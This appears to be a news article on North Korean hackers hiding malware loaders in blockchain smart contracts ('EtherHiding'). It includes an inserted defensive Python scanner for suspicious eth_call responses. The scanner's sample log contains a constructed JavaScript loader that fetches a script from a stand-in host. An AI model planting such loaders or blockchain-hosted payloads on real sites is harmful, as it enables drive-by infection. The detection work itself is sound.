North Korean Hackers Exploit Blockchain To Deploy Unremovable Malware

North Korean state-sponsored hackers, identified as UNC5342, have developed a novel technique to embed unremovable malware within blockchain smart contracts, posing a significant threat to the cryptocurrency industry. This method, termed "EtherHiding," leverages the immutable and transparent nature of public blockchains like Ethereum and BNB Smart Chain to conceal malicious code, making detection and removal exceedingly challenging.

The campaign, active since February 2025, involves the use of JavaScript-based loaders, such as JADESNOW, which download and execute a sophisticated backdoor named INVISIBLEFERRET directly from data stored on the blockchain. By utilizing read-only blockchain calls that do not generate visible transaction activity, the attackers evade detection mechanisms. The immutable nature of smart contracts ensures that once the malicious code is embedded, it cannot be altered or removed, allowing the malware to persist indefinitely.
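As an added defender-side example (not code from the original article, nor from the reported campaign), the following Python inspects logged JSON-RPC traffic and flags `eth_call` responses whose ABI-decoded `string` payload looks like script rather than data. The log format, the contract addresses and the loader text are constructed for illustration.

```python
import json
import re
from typing import List, Optional

# Constructed helper: ABI-encode a `string` return value the way a contract's
# view function would return it (offset word, length word, padded bytes).
def abi_encode_string(s: str) -> str:
    data = s.encode()
    head = (0x20).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (head + data + b"\x00" * ((-len(data)) % 32)).hex()

def abi_decode_string(hexdata: str) -> Optional[bytes]:
    """Decode an ABI-encoded `string` return; None if the data is not shaped like one."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64:
        return None
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        return None
    length = int.from_bytes(raw[offset:offset + 32], "big")
    body = raw[offset + 32:offset + 32 + length]
    return body if len(body) == length else None

# Tokens that a text value read from a contract should never need.
SCRIPT_MARKERS = re.compile(rb"\b(eval|Function|document\.write|createElement)\b|<script", re.I)

def eth_call_result_looks_like_code(result_hex: str) -> bool:
    payload = abi_decode_string(result_hex)
    if payload is None or len(payload) < 64:
        return False
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in payload)
    return printable / len(payload) >= 0.9 and bool(SCRIPT_MARKERS.search(payload))

def scan_rpc_log(lines: List[str]) -> List[str]:
    """Return the contract addresses whose eth_call responses decode to script-like text."""
    flagged = []
    for line in lines:
        entry = json.loads(line)
        if entry.get("method") == "eth_call" and eth_call_result_looks_like_code(entry.get("result", "0x")):
            flagged.append(entry["to"])
    return flagged

# Constructed sample log (hypothetical proxy recording JSON-RPC method, target and result).
LOADER_JS = 'var s=document.createElement("script");s.src="https://example.invalid/l.js";document.head.appendChild(s);'
SAMPLE_LOG = [
    json.dumps({"method": "eth_blockNumber", "to": None, "result": "0x1a2b3c"}),
    json.dumps({"method": "eth_call", "to": "0x" + "11" * 20, "result": "0x" + "00" * 31 + "2a"}),  # plain uint256
    json.dumps({"method": "eth_call", "to": "0x" + "ab" * 20, "result": abi_encode_string(LOADER_JS)}),
]

if __name__ == "__main__":
    print(scan_rpc_log(SAMPLE_LOG))
```

The heuristic is deliberately narrow: a legitimate contract returning a numeric value or a short label is not flagged, while a long, almost entirely printable string carrying DOM or eval markers is.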

To distribute the malware, UNC5342 has employed deceptive tactics, including compromising WordPress sites and luring cryptocurrency developers with fake job offers and coding challenges. Victims unknowingly trigger malware downloads by visiting these compromised websites, leading to the installation of the INVISIBLEFERRET backdoor. This approach signifies a concerning evolution in cyberattack strategies, utilizing blockchain technology for persistent and stealthy malware deployment.

The use of blockchain to host malicious payloads represents a shift toward next-generation "bulletproof hosting," where the decentralized and immutable characteristics of blockchain networks are exploited to avoid detection and takedown efforts. This development underscores the need for enhanced security measures within the cryptocurrency ecosystem to detect and mitigate such sophisticated threats.

In response to this emerging threat, cybersecurity experts recommend that blockchain platforms and cryptocurrency developers implement robust security protocols, conduct regular audits of smart contracts, and stay vigilant against social engineering tactics. Additionally, users are advised to exercise caution when interacting with unfamiliar websites or downloading files from untrusted sources to mitigate the risk of falling victim to such attacks.
